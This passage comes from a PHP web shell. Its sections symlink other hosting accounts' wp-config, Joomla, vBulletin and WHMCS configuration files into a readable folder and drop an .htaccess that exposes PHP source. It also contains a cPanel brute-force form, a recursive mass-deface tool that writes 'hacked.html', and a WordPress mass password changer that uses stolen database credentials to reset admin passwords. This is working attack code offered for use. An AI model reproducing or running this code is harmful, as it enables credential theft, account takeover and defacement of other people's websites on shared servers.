832. exit;
833. }
834. if($_POST['mendapatkan']=='passwd'){
835. @set_magic_quotes_runtime(0);
836. ob_start();
837. error_reporting(0);
838. @set_time_limit(0);
839. @ini_set('max_execution_time',0);
840. @ini_set('output_buffering',0);
841. $fn = $_POST['foldername'];
842. //all function here
843.  
844. function syml($usern,$pdomain)
845. {
846. symlink('/home/'.$usern.'/public_html/vb/includes/config.php',$pdomain.'~~vBulletin1.txt');
847. symlink('/home/'.$usern.'/public_html/includes/config.php',$pdomain.'~~vBulletin2.txt');
848. symlink('/home/'.$usern.'/public_html/forum/includes/config.php',$pdomain.'~~vBulletin3.txt');
849. symlink('/home/'.$usern.'/public_html/cc/includes/config.php',$pdomain.'~~vBulletin4.txt');
850. symlink('/home/'.$usern.'/public_html/config.php',$pdomain.'~~Phpbb1.txt');
851. symlink('/home/'.$usern.'/public_html/forum/includes/config.php',$pdomain.'~~Phpbb2.txt');
852. symlink('/home/'.$usern.'/public_html/wp-config.php',$pdomain.'~~Wordpress1.txt');
853. symlink('/home/'.$usern.'/public_html/blog/wp-config.php',$pdomain.'~~Wordpress2.txt');
854. symlink('/home/'.$usern.'/public_html/configuration.php',$pdomain.'~~Joomla1.txt');
855. symlink('/home/'.$usern.'/public_html/blog/configuration.php',$pdomain.'~~Joomla2.txt');
856. symlink('/home/'.$usern.'/public_html/joomla/configuration.php',$pdomain.'~~Joomla3.txt');
857. symlink('/home/'.$usern.'/public_html/whm/configuration.php',$pdomain.'~~Whm1.txt');
858. symlink('/home/'.$usern.'/public_html/whmc/configuration.php',$pdomain.'~~Whm2.txt');
859. symlink('/home/'.$usern.'/public_html/support/configuration.php',$pdomain.'~~Whm3.txt');
860. symlink('/home/'.$usern.'/public_html/client/configuration.php',$pdomain.'~~Whm4.txt');
861. symlink('/home/'.$usern.'/public_html/billings/configuration.php',$pdomain.'~~Whm5.txt');
862. symlink('/home/'.$usern.'/public_html/billing/configuration.php',$pdomain.'~~Whm6.txt');
863. symlink('/home/'.$usern.'/public_html/clients/configuration.php',$pdomain.'~~Whm7.txt');
864. symlink('/home/'.$usern.'/public_html/whmcs/configuration.php',$pdomain.'~~Whm8.txt');
865. symlink('/home/'.$usern.'/public_html/order/configuration.php',$pdomain.'~~Whm9.txt');
866. symlink('/home/'.$usern.'/public_html/admin/conf.php',$pdomain.'~~5.txt');
867. symlink('/home/'.$usern.'/public_html/admin/config.php',$pdomain.'~~4.txt');
868. symlink('/home/'.$usern.'/public_html/conf_global.php',$pdomain.'~~invisio.txt');
869. symlink('/home/'.$usern.'/public_html/include/db.php',$pdomain.'~~7.txt');
870. symlink('/home/'.$usern.'/public_html/connect.php',$pdomain.'~~8.txt');
871. symlink('/home/'.$usern.'/public_html/mk_conf.php',$pdomain.'~~mk-portale1.txt');
872. symlink('/home/'.$usern.'/public_html/include/config.php',$pdomain.'~~12.txt');
873. symlink('/home/'.$usern.'/public_html/settings.php',$pdomain.'~~Smf.txt');
874. symlink('/home/'.$usern.'/public_html/includes/functions.php',$pdomain.'~~phpbb3.txt');
875. symlink('/home/'.$usern.'/public_html/include/db.php',$pdomain.'~~infinity.txt');
876. symlink('/home2/'.$usern.'/public_html/vb/includes/config.php',$pdomain.'~~vBulletin1.txt');
877. symlink('/home2/'.$usern.'/public_html/includes/config.php',$pdomain.'~~vBulletin2.txt');
878. symlink('/home2/'.$usern.'/public_html/forum/includes/config.php',$pdomain.'~~vBulletin3.txt');
879. symlink('/home2/'.$usern.'/public_html/cc/includes/config.php',$pdomain.'~~vBulletin4.txt');
880. symlink('/home2/'.$usern.'/public_html/config.php',$pdomain.'~~Phpbb1.txt');
881. symlink('/home2/'.$usern.'/public_html/forum/includes/config.php',$pdomain.'~~Phpbb2.txt');
882. symlink('/home2/'.$usern.'/public_html/wp-config.php',$pdomain.'~~Wordpress1.txt');
883. symlink('/home2/'.$usern.'/public_html/blog/wp-config.php',$pdomain.'~~Wordpress2.txt');
884. symlink('/home2/'.$usern.'/public_html/configuration.php',$pdomain.'~~Joomla1.txt');
885. symlink('/home2/'.$usern.'/public_html/blog/configuration.php',$pdomain.'~~Joomla2.txt');
886. symlink('/home2/'.$usern.'/public_html/joomla/configuration.php',$pdomain.'~~Joomla3.txt');
887. symlink('/home2/'.$usern.'/public_html/whm/configuration.php',$pdomain.'~~Whm1.txt');
888. symlink('/home2/'.$usern.'/public_html/whmc/configuration.php',$pdomain.'~~Whm2.txt');
889. symlink('/home2/'.$usern.'/public_html/support/configuration.php',$pdomain.'~~Whm3.txt');
890. symlink('/home2/'.$usern.'/public_html/client/configuration.php',$pdomain.'~~Whm4.txt');
891. symlink('/home2/'.$usern.'/public_html/billings/configuration.php',$pdomain.'~~Whm5.txt');
892. symlink('/home2/'.$usern.'/public_html/billing/configuration.php',$pdomain.'~~Whm6.txt');
893. symlink('/home2/'.$usern.'/public_html/clients/configuration.php',$pdomain.'~~Whm7.txt');
894. symlink('/home2/'.$usern.'/public_html/whmcs/configuration.php',$pdomain.'~~Whm8.txt');
895. symlink('/home2/'.$usern.'/public_html/order/configuration.php',$pdomain.'~~Whm9.txt');
896. symlink('/home2/'.$usern.'/public_html/admin/conf.php',$pdomain.'~~5.txt');
897. symlink('/home2/'.$usern.'/public_html/admin/config.php',$pdomain.'~~4.txt');
898. symlink('/home2/'.$usern.'/public_html/conf_global.php',$pdomain.'~~invisio.txt');
899. symlink('/home2/'.$usern.'/public_html/include/db.php',$pdomain.'~~7.txt');
900. symlink('/home2/'.$usern.'/public_html/connect.php',$pdomain.'~~8.txt');
901. symlink('/home2/'.$usern.'/public_html/mk_conf.php',$pdomain.'~~mk-portale1.txt');
902. symlink('/home2/'.$usern.'/public_html/include/config.php',$pdomain.'~~12.txt');
903. symlink('/home2/'.$usern.'/public_html/settings.php',$pdomain.'~~Smf.txt');
904. symlink('/home2/'.$usern.'/public_html/includes/functions.php',$pdomain.'~~phpbb3.txt');
905. symlink('/home2/'.$usern.'/public_html/include/db.php',$pdomain.'~~infinity.txt');
906. symlink('/home3/'.$usern.'/public_html/vb/includes/config.php',$pdomain.'~~vBulletin1.txt');
907. symlink('/home3/'.$usern.'/public_html/includes/config.php',$pdomain.'~~vBulletin2.txt');
908. symlink('/home3/'.$usern.'/public_html/forum/includes/config.php',$pdomain.'~~vBulletin3.txt');
909. symlink('/home3/'.$usern.'/public_html/cc/includes/config.php',$pdomain.'~~vBulletin4.txt');
910. symlink('/home3/'.$usern.'/public_html/config.php',$pdomain.'~~Phpbb1.txt');
911. symlink('/home3/'.$usern.'/public_html/forum/includes/config.php',$pdomain.'~~Phpbb2.txt');
912. symlink('/home3/'.$usern.'/public_html/wp-config.php',$pdomain.'~~Wordpress1.txt');
913. symlink('/home3/'.$usern.'/public_html/blog/wp-config.php',$pdomain.'~~Wordpress2.txt');
914. symlink('/home3/'.$usern.'/public_html/configuration.php',$pdomain.'~~Joomla1.txt');
915. symlink('/home3/'.$usern.'/public_html/blog/configuration.php',$pdomain.'~~Joomla2.txt');
916. symlink('/home3/'.$usern.'/public_html/joomla/configuration.php',$pdomain.'~~Joomla3.txt');
917. symlink('/home3/'.$usern.'/public_html/whm/configuration.php',$pdomain.'~~Whm1.txt');
918. symlink('/home3/'.$usern.'/public_html/whmc/configuration.php',$pdomain.'~~Whm2.txt');
919. symlink('/home3/'.$usern.'/public_html/support/configuration.php',$pdomain.'~~Whm3.txt');
920. symlink('/home3/'.$usern.'/public_html/client/configuration.php',$pdomain.'~~Whm4.txt');
921. symlink('/home3/'.$usern.'/public_html/billings/configuration.php',$pdomain.'~~Whm5.txt');
922. symlink('/home3/'.$usern.'/public_html/billing/configuration.php',$pdomain.'~~Whm6.txt');
923. symlink('/home3/'.$usern.'/public_html/clients/configuration.php',$pdomain.'~~Whm7.txt');
924. symlink('/home3/'.$usern.'/public_html/whmcs/configuration.php',$pdomain.'~~Whm8.txt');
925. symlink('/home3/'.$usern.'/public_html/order/configuration.php',$pdomain.'~~Whm9.txt');
926. symlink('/home3/'.$usern.'/public_html/admin/conf.php',$pdomain.'~~5.txt');
927. symlink('/home3/'.$usern.'/public_html/admin/config.php',$pdomain.'~~4.txt');
928. symlink('/home3/'.$usern.'/public_html/conf_global.php',$pdomain.'~~invisio.txt');
929. symlink('/home3/'.$usern.'/public_html/include/db.php',$pdomain.'~~7.txt');
930. symlink('/home3/'.$usern.'/public_html/connect.php',$pdomain.'~~8.txt');
931. symlink('/home3/'.$usern.'/public_html/mk_conf.php',$pdomain.'~~mk-portale1.txt');
932. symlink('/home3/'.$usern.'/public_html/include/config.php',$pdomain.'~~12.txt');
933. symlink('/home3/'.$usern.'/public_html/settings.php',$pdomain.'~~Smf.txt');
934. symlink('/home3/'.$usern.'/public_html/includes/functions.php',$pdomain.'~~phpbb3.txt');
935. symlink('/home3/'.$usern.'/public_html/include/db.php',$pdomain.'~~infinity.txt');
936. symlink('/home4/'.$usern.'/public_html/vb/includes/config.php',$pdomain.'~~vBulletin1.txt');
937. symlink('/home4/'.$usern.'/public_html/includes/config.php',$pdomain.'~~vBulletin2.txt');
938. symlink('/home4/'.$usern.'/public_html/forum/includes/config.php',$pdomain.'~~vBulletin3.txt');
939. symlink('/home4/'.$usern.'/public_html/cc/includes/config.php',$pdomain.'~~vBulletin4.txt');
940. symlink('/home4/'.$usern.'/public_html/config.php',$pdomain.'~~Phpbb1.txt');
941. symlink('/home4/'.$usern.'/public_html/forum/includes/config.php',$pdomain.'~~Phpbb2.txt');
942. symlink('/home4/'.$usern.'/public_html/wp-config.php',$pdomain.'~~Wordpress1.txt');
943. symlink('/home4/'.$usern.'/public_html/blog/wp-config.php',$pdomain.'~~Wordpress2.txt');
944. symlink('/home4/'.$usern.'/public_html/configuration.php',$pdomain.'~~Joomla1.txt');
945. symlink('/home4/'.$usern.'/public_html/blog/configuration.php',$pdomain.'~~Joomla2.txt');
946. symlink('/home4/'.$usern.'/public_html/joomla/configuration.php',$pdomain.'~~Joomla3.txt');
947. symlink('/home4/'.$usern.'/public_html/whm/configuration.php',$pdomain.'~~Whm1.txt');
948. symlink('/home4/'.$usern.'/public_html/whmc/configuration.php',$pdomain.'~~Whm2.txt');
949. symlink('/home4/'.$usern.'/public_html/support/configuration.php',$pdomain.'~~Whm3.txt');
950. symlink('/home4/'.$usern.'/public_html/client/configuration.php',$pdomain.'~~Whm4.txt');
951. symlink('/home4/'.$usern.'/public_html/billings/configuration.php',$pdomain.'~~Whm5.txt');
952. symlink('/home4/'.$usern.'/public_html/billing/configuration.php',$pdomain.'~~Whm6.txt');
953. symlink('/home4/'.$usern.'/public_html/clients/configuration.php',$pdomain.'~~Whm7.txt');
954. symlink('/home4/'.$usern.'/public_html/whmcs/configuration.php',$pdomain.'~~Whm8.txt');
955. symlink('/home4/'.$usern.'/public_html/order/configuration.php',$pdomain.'~~Whm9.txt');
956. symlink('/home4/'.$usern.'/public_html/admin/conf.php',$pdomain.'~~5.txt');
957. symlink('/home4/'.$usern.'/public_html/admin/config.php',$pdomain.'~~4.txt');
958. symlink('/home4/'.$usern.'/public_html/conf_global.php',$pdomain.'~~invisio.txt');
959. symlink('/home4/'.$usern.'/public_html/include/db.php',$pdomain.'~~7.txt');
960. symlink('/home4/'.$usern.'/public_html/connect.php',$pdomain.'~~8.txt');
961. symlink('/home4/'.$usern.'/public_html/mk_conf.php',$pdomain.'~~mk-portale1.txt');
962. symlink('/home4/'.$usern.'/public_html/include/config.php',$pdomain.'~~12.txt');
963. symlink('/home4/'.$usern.'/public_html/settings.php',$pdomain.'~~Smf.txt');
964. symlink('/home4/'.$usern.'/public_html/includes/functions.php',$pdomain.'~~phpbb3.txt');
965. symlink('/home4/'.$usern.'/public_html/include/db.php',$pdomain.'~~infinity.txt');
966. symlink('/home5/'.$usern.'/public_html/vb/includes/config.php',$pdomain.'~~vBulletin1.txt');
967. symlink('/home5/'.$usern.'/public_html/includes/config.php',$pdomain.'~~vBulletin2.txt');
968. symlink('/home5/'.$usern.'/public_html/forum/includes/config.php',$pdomain.'~~vBulletin3.txt');
969. symlink('/home5/'.$usern.'/public_html/cc/includes/config.php',$pdomain.'~~vBulletin4.txt');
970. symlink('/home5/'.$usern.'/public_html/config.php',$pdomain.'~~Phpbb1.txt');
971. symlink('/home5/'.$usern.'/public_html/forum/includes/config.php',$pdomain.'~~Phpbb2.txt');
972. symlink('/home5/'.$usern.'/public_html/wp-config.php',$pdomain.'~~Wordpress1.txt');
973. symlink('/home5/'.$usern.'/public_html/blog/wp-config.php',$pdomain.'~~Wordpress2.txt');
974. symlink('/home5/'.$usern.'/public_html/configuration.php',$pdomain.'~~Joomla1.txt');
975. symlink('/home5/'.$usern.'/public_html/blog/configuration.php',$pdomain.'~~Joomla2.txt');
976. symlink('/home5/'.$usern.'/public_html/joomla/configuration.php',$pdomain.'~~Joomla3.txt');
977. symlink('/home5/'.$usern.'/public_html/whm/configuration.php',$pdomain.'~~Whm1.txt');
978. symlink('/home5/'.$usern.'/public_html/whmc/configuration.php',$pdomain.'~~Whm2.txt');
979. symlink('/home5/'.$usern.'/public_html/support/configuration.php',$pdomain.'~~Whm3.txt');
980. symlink('/home5/'.$usern.'/public_html/client/configuration.php',$pdomain.'~~Whm4.txt');
981. symlink('/home5/'.$usern.'/public_html/billings/configuration.php',$pdomain.'~~Whm5.txt');
982. symlink('/home5/'.$usern.'/public_html/billing/configuration.php',$pdomain.'~~Whm6.txt');
983. symlink('/home5/'.$usern.'/public_html/clients/configuration.php',$pdomain.'~~Whm7.txt');
984. symlink('/home5/'.$usern.'/public_html/whmcs/configuration.php',$pdomain.'~~Whm8.txt');
985. symlink('/home5/'.$usern.'/public_html/order/configuration.php',$pdomain.'~~Whm9.txt');
986. symlink('/home5/'.$usern.'/public_html/admin/conf.php',$pdomain.'~~5.txt');
987. symlink('/home5/'.$usern.'/public_html/admin/config.php',$pdomain.'~~4.txt');
988. symlink('/home5/'.$usern.'/public_html/conf_global.php',$pdomain.'~~invisio.txt');
989. symlink('/home5/'.$usern.'/public_html/include/db.php',$pdomain.'~~7.txt');
990. symlink('/home5/'.$usern.'/public_html/connect.php',$pdomain.'~~8.txt');
991. symlink('/home5/'.$usern.'/public_html/mk_conf.php',$pdomain.'~~mk-portale1.txt');
992. symlink('/home5/'.$usern.'/public_html/include/config.php',$pdomain.'~~12.txt');
993. symlink('/home5/'.$usern.'/public_html/settings.php',$pdomain.'~~Smf.txt');
994. symlink('/home5/'.$usern.'/public_html/includes/functions.php',$pdomain.'~~phpbb3.txt');
995. symlink('/home5/'.$usern.'/public_html/include/db.php',$pdomain.'~~infinity.txt');
996. symlink('/home6/'.$usern.'/public_html/vb/includes/config.php',$pdomain.'~~vBulletin1.txt');
997. symlink('/home6/'.$usern.'/public_html/includes/config.php',$pdomain.'~~vBulletin2.txt');
998. symlink('/home6/'.$usern.'/public_html/forum/includes/config.php',$pdomain.'~~vBulletin3.txt');
999. symlink('/home6/'.$usern.'/public_html/cc/includes/config.php',$pdomain.'~~vBulletin4.txt');
1000. symlink('/home6/'.$usern.'/public_html/config.php',$pdomain.'~~Phpbb1.txt');
1001. symlink('/home6/'.$usern.'/public_html/forum/includes/config.php',$pdomain.'~~Phpbb2.txt');
1002. symlink('/home6/'.$usern.'/public_html/wp-config.php',$pdomain.'~~Wordpress1.txt');
1003. symlink('/home6/'.$usern.'/public_html/blog/wp-config.php',$pdomain.'~~Wordpress2.txt');
1004. symlink('/home6/'.$usern.'/public_html/configuration.php',$pdomain.'~~Joomla1.txt');
1005. symlink('/home6/'.$usern.'/public_html/blog/configuration.php',$pdomain.'~~Joomla2.txt');
1006. symlink('/home6/'.$usern.'/public_html/joomla/configuration.php',$pdomain.'~~Joomla3.txt');
1007. symlink('/home6/'.$usern.'/public_html/whm/configuration.php',$pdomain.'~~Whm1.txt');
1008. symlink('/home6/'.$usern.'/public_html/whmc/configuration.php',$pdomain.'~~Whm2.txt');
1009. symlink('/home6/'.$usern.'/public_html/support/configuration.php',$pdomain.'~~Whm3.txt');
1010. symlink('/home6/'.$usern.'/public_html/client/configuration.php',$pdomain.'~~Whm4.txt');
1011. symlink('/home6/'.$usern.'/public_html/billings/configuration.php',$pdomain.'~~Whm5.txt');
1012. symlink('/home6/'.$usern.'/public_html/billing/configuration.php',$pdomain.'~~Whm6.txt');
1013. symlink('/home6/'.$usern.'/public_html/clients/configuration.php',$pdomain.'~~Whm7.txt');
1014. symlink('/home6/'.$usern.'/public_html/whmcs/configuration.php',$pdomain.'~~Whm8.txt');
1015. symlink('/home6/'.$usern.'/public_html/order/configuration.php',$pdomain.'~~Whm9.txt');
1016. symlink('/home6/'.$usern.'/public_html/admin/conf.php',$pdomain.'~~5.txt');
1017. symlink('/home6/'.$usern.'/public_html/admin/config.php',$pdomain.'~~4.txt');
1018. symlink('/home6/'.$usern.'/public_html/conf_global.php',$pdomain.'~~invisio.txt');
1019. symlink('/home6/'.$usern.'/public_html/include/db.php',$pdomain.'~~7.txt');
1020. symlink('/home6/'.$usern.'/public_html/connect.php',$pdomain.'~~8.txt');
1021. symlink('/home6/'.$usern.'/public_html/mk_conf.php',$pdomain.'~~mk-portale1.txt');
1022. symlink('/home6/'.$usern.'/public_html/include/config.php',$pdomain.'~~12.txt');
1023. symlink('/home6/'.$usern.'/public_html/settings.php',$pdomain.'~~Smf.txt');
1024. symlink('/home6/'.$usern.'/public_html/includes/functions.php',$pdomain.'~~phpbb3.txt');
1025. symlink('/home6/'.$usern.'/public_html/include/db.php',$pdomain.'~~infinity.txt');
1026. symlink('/home7/'.$usern.'/public_html/vb/includes/config.php',$pdomain.'~~vBulletin1.txt');
1027. symlink('/home7/'.$usern.'/public_html/includes/config.php',$pdomain.'~~vBulletin2.txt');
1028. symlink('/home7/'.$usern.'/public_html/forum/includes/config.php',$pdomain.'~~vBulletin3.txt');
1029. symlink('/home7/'.$usern.'/public_html/cc/includes/config.php',$pdomain.'~~vBulletin4.txt');
1030. symlink('/home7/'.$usern.'/public_html/config.php',$pdomain.'~~Phpbb1.txt');
1031. symlink('/home7/'.$usern.'/public_html/forum/includes/config.php',$pdomain.'~~Phpbb2.txt');
1032. symlink('/home7/'.$usern.'/public_html/wp-config.php',$pdomain.'~~Wordpress1.txt');
1033. symlink('/home7/'.$usern.'/public_html/blog/wp-config.php',$pdomain.'~~Wordpress2.txt');
1034. symlink('/home7/'.$usern.'/public_html/configuration.php',$pdomain.'~~Joomla1.txt');
1035. symlink('/home7/'.$usern.'/public_html/blog/configuration.php',$pdomain.'~~Joomla2.txt');
1036. symlink('/home7/'.$usern.'/public_html/joomla/configuration.php',$pdomain.'~~Joomla3.txt');
1037. symlink('/home7/'.$usern.'/public_html/whm/configuration.php',$pdomain.'~~Whm1.txt');
1038. symlink('/home7/'.$usern.'/public_html/whmc/configuration.php',$pdomain.'~~Whm2.txt');
1039. symlink('/home7/'.$usern.'/public_html/support/configuration.php',$pdomain.'~~Whm3.txt');
1040. symlink('/home7/'.$usern.'/public_html/client/configuration.php',$pdomain.'~~Whm4.txt');
1041. symlink('/home7/'.$usern.'/public_html/billings/configuration.php',$pdomain.'~~Whm5.txt');
1042. symlink('/home7/'.$usern.'/public_html/billing/configuration.php',$pdomain.'~~Whm6.txt');
1043. symlink('/home7/'.$usern.'/public_html/clients/configuration.php',$pdomain.'~~Whm7.txt');
1044. symlink('/home7/'.$usern.'/public_html/whmcs/configuration.php',$pdomain.'~~Whm8.txt');
1045. symlink('/home7/'.$usern.'/public_html/order/configuration.php',$pdomain.'~~Whm9.txt');
1046. symlink('/home7/'.$usern.'/public_html/admin/conf.php',$pdomain.'~~5.txt');
1047. symlink('/home7/'.$usern.'/public_html/admin/config.php',$pdomain.'~~4.txt');
1048. symlink('/home7/'.$usern.'/public_html/conf_global.php',$pdomain.'~~invisio.txt');
1049. symlink('/home7/'.$usern.'/public_html/include/db.php',$pdomain.'~~7.txt');
1050. symlink('/home7/'.$usern.'/public_html/connect.php',$pdomain.'~~8.txt');
1051. symlink('/home7/'.$usern.'/public_html/mk_conf.php',$pdomain.'~~mk-portale1.txt');
1052. symlink('/home7/'.$usern.'/public_html/include/config.php',$pdomain.'~~12.txt');
1053. symlink('/home7/'.$usern.'/public_html/settings.php',$pdomain.'~~Smf.txt');
1054. symlink('/home7/'.$usern.'/public_html/includes/functions.php',$pdomain.'~~phpbb3.txt');
1055. symlink('/home7/'.$usern.'/public_html/include/db.php',$pdomain.'~~infinity.txt');
1056. }
1057.  
1058. $d0mains = @file("/etc/named.conf");
1059.  
1060. if($d0mains)
1061. {
1062. mkdir($fn);
1063. chdir($fn);
1064.  
1065. foreach($d0mains as $d0main)
1066. {
1067. if(eregi("zone",$d0main))
1068. {
1069. preg_match_all('#zone "(.*)"#', $d0main, $domains);
1070. flush();
1071.  
1072. if(strlen(trim($domains[1][0])) > 2)
1073. {
1074. $user = posix_getpwuid(@fileowner("/etc/valiases/".$domains[1][0]));
1075.  
1076. syml($user['name'],$domains[1][0]);
1077. }
1078. }
1079. }
1080. echo "<center><font color=springgreen size=3>Done</font></center>";
1081. echo "<br><center><a href=$fn/ target=_blank><font size=3 color=#009900>Here</font></a></center>";
1082. }
1083. else
1084. {
1085. mkdir($fn);
1086. chdir($fn);
1087. $temp = "";
1088. $val1 = 0;
1089. $val2 = 1000;
1090. for(;$val1 <= $val2;$val1++)
1091. {
1092. $uid = @posix_getpwuid($val1);
1093. if ($uid)
1094. $temp .= join(':',$uid)."\n";
1095. }
1096. echo '<br/>';
1097. $temp = trim($temp);
1098.  
1099. $file5 = fopen("test.txt","w");
1100. fputs($file5,$temp);
1101. fclose($file5);
1102.  
1103. $htaccess =
1104. 'T3B0aW9ucyBhbGwgCkRpcmVjdG9yeUluZGV4IHJlYWRtZS5odG1sIApBZGRUeXBlIHRleHQvcGxh
1105. aW4gLnBocCAKQWRkSGFuZGxlciBzZXJ2ZXItcGFyc2VkIC5waHAgCkFkZFR5cGUgdGV4dC9wbGFp
1106. biAuaHRtbCAKQWRkSGFuZGxlciB0eHQgLmh0bWwgClJlcXVpcmUgTm9uZSAKU2F0aXNmeSBBbnk=
1107. ';
1108. $file = fopen(".htaccess","w+");
1109. $write = fwrite ($file ,base64_decode($htaccess));
1110.  
1111. $file = fopen("test.txt", "r") or exit("Unable to open file!");
1112. while(!feof($file))
1113. {
1114. $s = fgets($file);
1115. $matches = array();
1116. $t = preg_match('/\/(.*?)\:\//s', $s, $matches);
1117. $matches = str_replace("home/","",$matches[1]);
1118. if(strlen($matches) > 12 || strlen($matches) == 0 || $matches == "bin" || $matches == "etc/X11/fs" || $matches == "var/lib/nfs" || $matches == "var/arpwatch" || $matches == "var/gopher" || $matches == "sbin" || $matches == "var/adm" || $matches == "usr/games" || $matches == "var/ftp" || $matches == "etc/ntp" || $matches == "var/www" || $matches == "var/named")
1119. continue;
1120. syml($matches,$matches);
1121. }
1122. fclose($file);
1123. echo "</table>";
1124. unlink("test.txt");
1125. echo "<center><font color=springgreen size=3>Done</font></center>";
1126. echo "<br><center><a href=$fn/ target=_blank><font size=3 color=#009900>Here</font></a></center>";
1127. }
1128. echo "<hr><center><b><a href=".$_SERVER['PHP_SELF'].">BACK</a>";
1129. exit;
1130. }
1131. ?>
1132. <form method="POST" target="_blank">
1133. <input name="page" type="hidden" value="find">
1134. <table border=1>
1135. <body bgcolor="black" text="white"><br><br>
1136.  
1137. <center><b><font size="2" style="italic" color="white">Cpanel BruteForce<br><br></b></center></td></tr>
1138. <tr>
1139. <td>
1140. <strong>User :</strong>
1141. </td>
1142. <td>
1143. <strong><textarea cols="50" style="background:#191818;outline:none;color:white;" rows="5" name="usernames"><?php system('ls /var/mail');?></textarea></strong>
1144. </td>
1145. <tr>
1146. <td>
1147. <strong>Pass :</strong>
1148. </td>
1149. <td>
1150. <strong><textarea cols="50" style="background:#191818;outline:none;color:white;" rows="5" name="passwords"></textarea></strong>
1151. </td>
1152. </tr>
1153. <tr>
1154. <td>
1155. <strong>Type :</strong>
1156. </td>
1157. <td>
1158. <span style="background:#191818;outline:none;color:white;"><strong>Simple : </strong> </span>
1159. <strong>
1160. <input type="radio" name="type" value="simple" checked="checked" class="style3"></strong>
1161. <font style="background:black;outline:none;color:white;"><strong>/etc/passwd : </strong> </font>
1162. <strong>
1163. <input type="radio" name="type" value="passwd" style="background:black;outline:none;color:white;"></strong><span class="style3"><strong>
1164. </strong>
1165. </span>
1166. <td style="background:black;outline:none;color:white;" >
1167. <strong><input class ='bordergaya' type="submit" value="START"></strong>
1168. </td>
1169. </tr>
1170. </table>
1171. <br>
1172. <table border=1>
1173. </form>
1174. <tr>
1175. <td style="background:black;outline:none;color:white;">
1176. <strong>Get Wordlist</strong>
1177. <form method="POST" target="_blank">
1178. <strong>
1179. <input name="pass" type="hidden" value="password">
1180. </strong>
1181. <strong>Url Config :</strong>
1182. <td>
1183.  
1184. <strong>
1185. <input style="background:black;outline:none;color:white;" size="80" name="url" type="text"></strong>
1186.  
1187. <td style="background:black;outline:none;color:white;"><strong><input class ='bordergaya' type="submit" value="GO">
1188. </strong>
1189. </td>
1190. </table>
1191. <?php
1192. echo"<br/><br/>";
1193. die();
1194. }
1195. elseif(isset($_GET['x']) && ($_GET['x'] == 'massde'))
1196. {
1197. ?></center></center>
1198. <style type="text/css">
1199. .ketengah{
1200. text-align: left;
1201. font-size: 16px;
1202. color: orange;
1203. font-family: Homenaje;
1204. margin-left: 18%;
1205. </style>
1206. <?php
1207. /*thanks To IndoXploit*/
1208. function sabun_massal($path,$namafile,$isi_script) {
1209. if(is_writable($path)) {
1210. $patha = scandir($path);
1211. foreach($patha as $pathb) {
1212. $pathc = "$path/$pathb";
1213. $lokasi = $pathc.'/'.$namafile;
1214. if($pathb === '.') {
1215. file_put_contents($lokasi, $isi_script);
1216. } elseif($pathb === '..') {
1217. file_put_contents($lokasi, $isi_script);
1218. } else {
1219. if(is_dir($pathc)) {
1220. if(is_writable($pathc)) {
1221. echo "<font class='ketengah'><font color=crimson>-:-</font><font color=white>Sukses Bos Q</font><font color=crimson>-:-</font> <font color=springgreen>Cek di :</font> $lokasi</font><br>";
1222. file_put_contents($lokasi, $isi_script);
1223. $idx = sabun_massal($pathc,$namafile,$isi_script);
1224. }
1225. }
1226. }
1227. }
1228. }
1229. }
1230. if($_POST['start']) {
1231. echo "<div style='margin: 5px auto; padding: 5px'>";
1232. sabun_massal($_POST['d_dir'], $_POST['d_file'], $_POST['script']);
1233. echo "</div>";
1234. } else {
1235. echo "<center>";
1236. echo "<form method='post'><br><br>
1237. <table>
1238. <tr>
1239. <td><font style='text-decoration: underline; margin-left:10px;'>Folder</font></td>
1240. <td align='center'>:</td>
1241. <td><input class='justborder' type='text' name='d_dir' value='$path' style='width: 95%;' height='10'><br></td>
1242. </tr>
1243. <tr>
1244. <td><font style='text-decoration: underline; margin-left:10px;'>Filename</font></td>
1245. <td align='center'>:</td>
1246. <td><input class='justborder' type='text' name='d_file' value='hacked.html' style='width: 95%;' height='10'><br></td>
1247. </tr>
1248. <tr>
1249. <td colspan='3' align='center'><font style='text-decoration: underline;'>Script Deface : </font><br></td>
1250. </tr>
1251. <tr>
1252. <td colspan='3'><textarea class='justborder' name='script' style='width: 500px; height: 200px;'>Hacked by 4RNN0Ts!</textarea><br></td>
1253. </tr>
1254. <tr>
1255. <td colspan='3' align='center'><input class='justborder' type='submit' name='start' value='Mass Deface' style='width: 50%;'><br/></td>
1256. </tr>
1257. </table><br><br><br>
1258. </form></center><br/>";
1259. }die();?><center><center><?php
1260. }
1261. elseif(isset($_GET['x']) && ($_GET['x'] == 'mpc'))
1262. {
1263. ?>
1264. <form action="?path=<?php echo $path; ?>&amp;x=mpc" method="post">
1265. <?php
1266. set_time_limit(0);
1267. ini_set('display_errors', 0);
1268.  
1269. echo '<center><h2>WordPress Mass Password Changer</h2></center>';
1270. echo '<form method="POST" action="" >
1271. <center><table border="1" class="justborder"><tr><td>Config List:</td>
1272. <td><textarea class="justborder" name="url" cols="50" rows="10" ></textarea></td></tr>
1273. <tr><td>User/Password</td><td><input class="justborder" type="text" name="username" size="25" value="Psrmrh"> /
1274. <input class="justborder" type="text" name="password" size="25" value="auahgelap"></td></tr></table>
1275. <br><input class="bordergaya" type="Submit" class="button" value="Submit"><input type="hidden" name="action" value="1"></form></center>';
1276.  
1277. if ($_POST['action']=='1'){
1278. if ($_POST['url']==''){
1279. echo "<div class='result'>No CONFIG FOUND<br>Make sure you provided a config list!</div><br>";
1280. }else{
1281. $url=$_POST['url'];
1282. $users = explode("\n",$url);
1283. foreach ($users as $user) {
1284. $user1=trim($user);
1285. $code=file_get_contents2($user1);
1286. preg_match_all('|define.*\(.*\'DB_NAME\'.*,.*\'(.*)\'.*\).*;|isU',$code,$b1);
1287. $db=$b1[1][0];
1288. preg_match_all('|define.*\(.*\'DB_USER\'.*,.*\'(.*)\'.*\).*;|isU',$code,$b2);
1289. $user=$b2[1][0];
1290. preg_match_all('|define.*\(.*\'DB_PASSWORD\'.*,.*\'(.*)\'.*\).*;|isU',$code,$b3);
1291. $db_password=$b3[1][0];
1292. preg_match_all('|define.*\(.*\'DB_HOST\'.*,.*\'(.*)\'.*\).*;|isU',$code,$b4);
1293. $host=$b4[1][0];
1294. preg_match_all('|\$table_prefix.*=.*\'(.*)\'.*;|isU',$code,$b5);
1295. $p=$b5[1][0];
1296.  
1297. $d=@mysql_connect( $host, $user, $db_password ) ;
1298. if ($d){
1299. @mysql_select_db($db );
1300. $usern=$_POST['username'];
1301. $passwd=$_POST['password'];
1302. $sql = "UPDATE `".$p."users` SET `user_pass` = MD5( '".$passwd."' ) WHERE `ID` = '1';";
1303. @mysql_query($sql) ; ;
